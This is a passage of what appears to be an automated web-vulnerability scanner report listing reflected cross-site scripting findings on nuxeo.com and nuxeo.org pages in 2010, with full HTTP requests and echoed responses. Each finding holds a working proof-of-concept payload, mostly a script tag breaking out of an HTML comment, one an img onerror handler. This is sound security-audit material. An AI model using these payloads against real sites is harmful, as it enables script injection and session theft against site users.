1.8. http://www.nuxeo.com/en/downloads/download-dm-form [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.com
Path:   /en/downloads/download-dm-form

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 15bd8--><script>alert(1)</script>86fa8735a8f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/downloads15bd8--><script>alert(1)</script>86fa8735a8f/download-dm-form HTTP/1.1
Host: www.nuxeo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: eZSESSID=6b9813c12cd856e64db65c55d01947a8;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:18:41 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: eZ Publish
Expires: Mon, 15 Nov 2010 12:18:41 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 14:18:41 GMT
Served-by: www.nuxeo.com
Content-language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33715

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<hea
...[SNIP]...
<!--/en/downloads15bd8--><script>alert(1)</script>86fa8735a8f/download-dm-form/-->
...[SNIP]...

1.9. http://www.nuxeo.com/en/downloads/download-dm-form [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.com
Path:   /en/downloads/download-dm-form

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload df27c--><script>alert(1)</script>40a84b08494 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/downloads/download-dm-formdf27c--><script>alert(1)</script>40a84b08494 HTTP/1.1
Host: www.nuxeo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: eZSESSID=6b9813c12cd856e64db65c55d01947a8;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:19:08 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: eZ Publish
Expires: Mon, 15 Nov 2010 12:19:08 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 14:19:08 GMT
Served-by: www.nuxeo.com
Content-language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33678

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<hea
...[SNIP]...
<!--/en/downloads/download-dm-formdf27c--><script>alert(1)</script>40a84b08494/-->
...[SNIP]...

1.10. http://www.nuxeo.com/en/products/document-management/getting-started [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.com
Path:   /en/products/document-management/getting-started

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 6945d--><script>alert(1)</script>9547c34988d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en6945d--><script>alert(1)</script>9547c34988d/products/document-management/getting-started HTTP/1.1
Host: www.nuxeo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: eZSESSID=6b9813c12cd856e64db65c55d01947a8;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:17:51 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: eZ Publish
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 14:17:51 GMT
Served-by: www.nuxeo.com
Content-language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33747

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<hea
...[SNIP]...
<!--/en6945d--><script>alert(1)</script>9547c34988d/products/document-management/getting-started/-->
...[SNIP]...

1.11. http://www.nuxeo.com/en/products/document-management/getting-started [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.com
Path:   /en/products/document-management/getting-started

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 8692f--><script>alert(1)</script>841c8c775c8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/products8692f--><script>alert(1)</script>841c8c775c8/document-management/getting-started HTTP/1.1
Host: www.nuxeo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: eZSESSID=6b9813c12cd856e64db65c55d01947a8;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:18:43 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: eZ Publish
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 14:18:43 GMT
Served-by: www.nuxeo.com
Content-language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33750

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<hea
...[SNIP]...
<!--/en/products8692f--><script>alert(1)</script>841c8c775c8/document-management/getting-started/-->
...[SNIP]...

1.12. http://www.nuxeo.com/en/products/document-management/getting-started [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.com
Path:   /en/products/document-management/getting-started

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 4d655--><script>alert(1)</script>e6f61f7d157 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/products/document-management4d655--><script>alert(1)</script>e6f61f7d157/getting-started HTTP/1.1
Host: www.nuxeo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: eZSESSID=6b9813c12cd856e64db65c55d01947a8;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:19:20 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: eZ Publish
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 14:19:20 GMT
Served-by: www.nuxeo.com
Content-language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<hea
...[SNIP]...
<!--/en/products/document-management4d655--><script>alert(1)</script>e6f61f7d157/getting-started/-->
...[SNIP]...

1.13. http://www.nuxeo.com/en/products/document-management/getting-started [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.com
Path:   /en/products/document-management/getting-started

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload 74450--><script>alert(1)</script>6984a629a28 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/products/document-management/getting-started74450--><script>alert(1)</script>6984a629a28 HTTP/1.1
Host: www.nuxeo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: eZSESSID=6b9813c12cd856e64db65c55d01947a8;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:19:48 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: eZ Publish
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 14:19:49 GMT
Served-by: www.nuxeo.com
Content-language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<hea
...[SNIP]...
<!--/en/products/document-management/getting-started74450--><script>alert(1)</script>6984a629a28/-->
...[SNIP]...

1.14. http://www.nuxeo.com/en/services/training [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.com
Path:   /en/services/training

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 71135--><script>alert(1)</script>410caedb9c4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en71135--><script>alert(1)</script>410caedb9c4/services/training HTTP/1.1
Host: www.nuxeo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: eZSESSID=6b9813c12cd856e64db65c55d01947a8;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:18:01 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: eZ Publish
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 14:18:02 GMT
Served-by: www.nuxeo.com
Content-language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33693

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<hea
...[SNIP]...
<!--/en71135--><script>alert(1)</script>410caedb9c4/services/training/-->
...[SNIP]...

1.15. http://www.nuxeo.com/en/services/training [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.com
Path:   /en/services/training

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 7dac6--><script>alert(1)</script>417df72f5c7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/services7dac6--><script>alert(1)</script>417df72f5c7/training HTTP/1.1
Host: www.nuxeo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: eZSESSID=6b9813c12cd856e64db65c55d01947a8;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:18:54 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: eZ Publish
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 14:18:54 GMT
Served-by: www.nuxeo.com
Content-language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<hea
...[SNIP]...
<!--/en/services7dac6--><script>alert(1)</script>417df72f5c7/training/-->
...[SNIP]...

1.16. http://www.nuxeo.com/en/services/training [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.com
Path:   /en/services/training

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 38728--><script>alert(1)</script>3534a3f71fa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/services/training38728--><script>alert(1)</script>3534a3f71fa HTTP/1.1
Host: www.nuxeo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: eZSESSID=6b9813c12cd856e64db65c55d01947a8;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:19:39 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: eZ Publish
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 14:19:39 GMT
Served-by: www.nuxeo.com
Content-language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33659

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<hea
...[SNIP]...
<!--/en/services/training38728--><script>alert(1)</script>3534a3f71fa/-->
...[SNIP]...

1.17. http://www.nuxeo.com/extension/nuxeo_design/design/nuxeo/javascript/mtcJSAPI.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.com
Path:   /extension/nuxeo_design/design/nuxeo/javascript/mtcJSAPI.js

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 7e1f1--><script>alert(1)</script>7e40053b44 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /extension7e1f1--><script>alert(1)</script>7e40053b44/nuxeo_design/design/nuxeo/javascript/mtcJSAPI.js HTTP/1.1
Accept: */*
Referer: http://www.nuxeo.org/xwiki/bin/view/Main/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.nuxeo.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:08:59 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: eZ Publish
Set-Cookie: eZSESSID=8303555f256cc3d6f8049a70f1d2db56; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 14:08:59 GMT
Served-by: www.nuxeo.com
Content-language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 33774

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<hea
...[SNIP]...
<!--/extension7e1f1--><script>alert(1)</script>7e40053b44/nuxeo_design/design/nuxeo/javascript/mtcJSAPI.js/-->
...[SNIP]...

1.18. http://www.nuxeo.com/extension/nuxeo_design/design/nuxeo/javascript/mtcJSAPI.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.com
Path:   /extension/nuxeo_design/design/nuxeo/javascript/mtcJSAPI.js

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 10d63--><script>alert(1)</script>ad21aa13a8b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /extension/nuxeo_design/design10d63--><script>alert(1)</script>ad21aa13a8b/nuxeo/javascript/mtcJSAPI.js HTTP/1.1
Accept: */*
Referer: http://www.nuxeo.org/xwiki/bin/view/Main/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.nuxeo.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:09:27 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: eZ Publish
Set-Cookie: eZSESSID=0fb05ad10c166829ebc54c5d76671e37; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 14:09:27 GMT
Served-by: www.nuxeo.com
Content-language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 33739

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<hea
...[SNIP]...
<!--/extension/nuxeo_design/design10d63--><script>alert(1)</script>ad21aa13a8b/nuxeo/javascript/mtcJSAPI.js/-->
...[SNIP]...

1.19. http://www.nuxeo.com/extension/nuxeo_design/design/nuxeo/javascript/mtcJSAPI.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.com
Path:   /extension/nuxeo_design/design/nuxeo/javascript/mtcJSAPI.js

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 3bff6--><script>alert(1)</script>be29ccef587 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /extension/nuxeo_design/design/nuxeo/javascript3bff6--><script>alert(1)</script>be29ccef587/mtcJSAPI.js HTTP/1.1
Accept: */*
Referer: http://www.nuxeo.org/xwiki/bin/view/Main/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.nuxeo.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:09:54 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: eZ Publish
Set-Cookie: eZSESSID=213640b5ccd9e02f69c3dca67dfd6a01; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 14:09:54 GMT
Served-by: www.nuxeo.com
Content-language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 33739

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<hea
...[SNIP]...
<!--/extension/nuxeo_design/design/nuxeo/javascript3bff6--><script>alert(1)</script>be29ccef587/mtcJSAPI.js/-->
...[SNIP]...

1.20. http://www.nuxeo.org/discussions/index.jspa [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /discussions/index.jspa

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3ade"><script>alert(1)</script>c594b43b6bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /discussions/index.jspa?d3ade"><script>alert(1)</script>c594b43b6bf=1 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 14:17:55 GMT
Server: Server: Jetty(6.0.x)
Content-Type: text/html; charset=iso-8859-1
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=10e4g71e3s4cu;Path=/discussions
Content-Language: en
Set-Cookie: jive.server.info=serverName=www.nuxeo.org:serverPort=80:contextPath=/discussions:localName=212.85.154.51:localPort=9809:localAddr=212.85.154.51;Path=/discussions
Set-Cookie: jive.server.info=serverName=www.nuxeo.org:serverPort=80:contextPath=/discussions:localName=212.85.154.51:localPort=9809:localAddr=212.85.154.51;Path=/discussions
Set-Cookie: jive.server.info=serverName=www.nuxeo.org:serverPort=80:contextPath=/discussions:localName=212.85.154.51:localPort=9809:localAddr=212.85.154.51;Path=/discussions
Set-Cookie: jive.server.info=serverName=www.nuxeo.org:serverPort=80:contextPath=/discussions:localName=212.85.154.51:localPort=9809:localAddr=212.85.154.51;Path=/discussions
Set-Cookie: jive.server.info=serverName=www.nuxeo.org:serverPort=80:contextPath=/discussions:localName=212.85.154.51:localPort=9809:localAddr=212.85.154.51;Path=/discussions
Set-Cookie: jive.server.info=serverName=www.nuxeo.org:serverPort=80:contextPath=/discussions:localName=212.85.154.51:localPort=9809:localAddr=212.85.154.51;Path=/discussions
Set-Cookie: jive.server.info=serverName=www.nuxeo.org:serverPort=80:contextPath=/discussions:localName=212.85.154.51:localPort=9809:localAddr=212.85.154.51;Path=/discussions
Set-Cookie: jive.server.info=serverName=www.nuxeo.org:serverPort=80:contextPath=/discussions:localName=212.85.154.51:localPort=9809:localAddr=212.85.154.51;Path=/discussions
Set-Cookie: jive.server.info=serverName=www.nuxeo.org:serverPort=80:contextPath=/discussions:localName=212.85.154.51:localPort=9809:localAddr=212.85.154.51;Path=/discussions
Set-Cookie: jive.server.info=serverName=www.nuxeo.org:serverPort=80:contextPath=/discussions:localName=212.85.154.51:localPort=9809:localAddr=212.85.154.51;Path=/discussions
Set-Cookie: jive.server.info=serverName=www.nuxeo.org:serverPort=80:contextPath=/discussions:localName=212.85.154.51:localPort=9809:localAddr=212.85.154.51;Path=/discussions
Set-Cookie: jive.server.info=serverName=www.nuxeo.org:serverPort=80:contextPath=/discussions:localName=212.85.154.51:localPort=9809:localAddr=212.85.154.51;Path=/discussions
Set-Cookie: jive.server.info=serverName=www.nuxeo.org:serverPort=80:contextPath=/discussions:localName=212.85.154.51:localPort=9809:localAddr=212.85.154.51;Path=/discussions
Vary: Accept-Encoding
Connection: close
Content-Length: 46232


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head>
<title>Support Forums : Forum Home</title>
<meta http-equiv="content-type" content="text/html; charset=ISO-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/discussions/style/style.jsp?d3ade"><script>alert(1)</script>c594b43b6bf=1" />
...[SNIP]...

1.21. http://www.nuxeo.org/xwiki/bin/export/Main/WebHome [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/export/Main/WebHome

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f83de"><img%20src%3da%20onerror%3dalert(1)>5f41d66ee78 was submitted in the REST URL parameter 4. This input was echoed as f83de"><img src=a onerror=alert(1)>5f41d66ee78 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/export/Mainf83de"><img%20src%3da%20onerror%3dalert(1)>5f41d66ee78/WebHome HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 14:18:25 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12858
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
